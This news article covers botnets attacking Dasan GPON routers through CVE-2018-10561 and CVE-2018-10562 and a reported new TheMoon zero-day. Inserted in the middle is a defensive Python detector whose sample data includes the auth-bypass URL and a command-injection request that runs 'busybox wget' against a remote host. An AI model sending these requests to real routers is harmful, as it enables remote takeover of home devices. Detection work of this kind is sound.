GPON zero-day

Attacks on Dasan GPON routers are continuing through two vulnerabilities disclosed last month, but today researchers from Qihoo 360 Netlab revealed that one botnet operator appears to have deployed a new zero-day affecting the same router models.

The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.

"We tested this payload on two different versions of [Dasan] GPON home router," the Netlab team said, "all work."

TheMoon botnet behind new Dasan GPON zero-day

The botnet exploiting this new GPON router zero-day is called TheMoon, a very old threat that was first spotted in 2014 infecting Linux servers but has switched to home routers and IoT devices in recent years.

TheMoon is only the latest botnet to add support for exploiting Dasan GPON routers. Five others, Hajime, Mettle, Mirai, Muhstik, and Satori, have been using exploits for two older vulnerabilities for almost a week.

The two exploits these five botnets were targeting are CVE-2018-10561 and CVE-2018-10562.

These two vulnerabilities, an authentication bypass (CVE-2018-10561) and a command injection flaw (CVE-2018-10562) that can be chained for unauthenticated remote command execution, allow attackers to take over affected devices, GPON routers made by South Korean vendor Dasan. GPON stands for Gigabit Passive Optical Network and is a telecommunications technology for delivering internet connections over fiber-optic lines.
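As an added example that is not part of the article and not Netlab's or Dasan's code, the Python below flags exploit attempts against the two CVEs in request records of the kind a honeypot or WAF would keep (method, target URL, POST body). The detection patterns rest on the public disclosure of the bugs, not on anything the article states: CVE-2018-10561 is triggered by appending `?images/` to a URL so the login check is skipped, and CVE-2018-10562 is command injection through the `dest_host` field of the `/GponForm/diag_Form` diagnostics endpoint. The sample requests, source addresses and the `busybox wget` payload are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests as a honeypot or WAF would record them.
# These are illustrative, not captured traffic; addresses are documentation ranges.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.5", "method": "GET",
     "target": "/menu.html?images/", "body": ""},
    {"src": "203.0.113.5", "method": "POST",
     "target": "/GponForm/diag_Form?images/",
     "body": ("XWebPageName=diag&diag_action=ping&wan_conlist=0"
              "&dest_host=`busybox wget http://203.0.113.9/x -O /tmp/x`&ipv=0")},
    {"src": "198.51.100.7", "method": "GET",
     "target": "/images/logo.png", "body": ""},
    {"src": "198.51.100.7", "method": "POST",
     "target": "/GponForm/diag_Form",
     "body": "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=8.8.8.8&ipv=0"},
]

# Shell metacharacters that have no place in a hostname/IP passed to a ping form.
SHELL_META = re.compile(r"[`;|]|\$\(")


def classify(req):
    """Return the names of the detection rules this request matches."""
    hits = []
    parts = urlsplit(req["target"])

    # CVE-2018-10561 (public disclosure): a query string beginning with
    # "images/" makes the router's web server treat the request as a static
    # image fetch and skip authentication, whatever the path actually is.
    if parts.query.startswith("images/"):
        hits.append("CVE-2018-10561 auth bypass")

    # CVE-2018-10562 (public disclosure): the diagnostics form hands dest_host
    # to a shell, so metacharacters in that field mean command injection.
    if req["method"] == "POST" and parts.path == "/GponForm/diag_Form":
        form = parse_qs(req["body"], keep_blank_values=True)
        if any(SHELL_META.search(host) for host in form.get("dest_host", [])):
            hits.append("CVE-2018-10562 command injection")

    return hits


def scan(requests):
    """Run every request through classify() and keep only the ones that fired."""
    findings = []
    for req in requests:
        rules = classify(req)
        if rules:
            findings.append({"src": req["src"], "target": req["target"], "rules": rules})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding["src"], finding["target"], "->", ", ".join(finding["rules"]))
```

The two rules are kept separate on purpose: a lone `?images/` hit shows someone probing for the bypass, while a `diag_Form` POST carrying a backtick or `$(` is the actual takeover attempt, and the second usually follows the first from the same source within a second or two.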

Despite a botnet party, only 2% of GPON routers were hacked

Initially, it was believed the number of exposed devices was over one million, but the device maker later officially stated that the number of devices vulnerable to CVE-2018-10561 and CVE-2018-10562 was only 240,000.

The good news is that, despite the large number of vulnerable devices, the five botnets that went after these routers last week largely failed to take them over, because the exploit packages they used did not infect devices properly.

Netlab says that these five botnets managed to infect only around 2% of the entire pool of vulnerable GPON routers.

This might change in the coming days, thanks to the new zero-day deployed by TheMoon botnet but also because the other botnet operators have been improving their exploit payloads over the past few days.

One of six botnets has been taken down —for now

Nonetheless, Netlab says that, together with partners in the security industry, it has scored a win for the good guys: it managed to take down the servers of the Muhstik botnet, one of the five botnets that were targeting GPON routers last week.

However, the victory may be short-lived, as Muhstik admins appear to be attempting to install new servers and resume their router hacking activities.
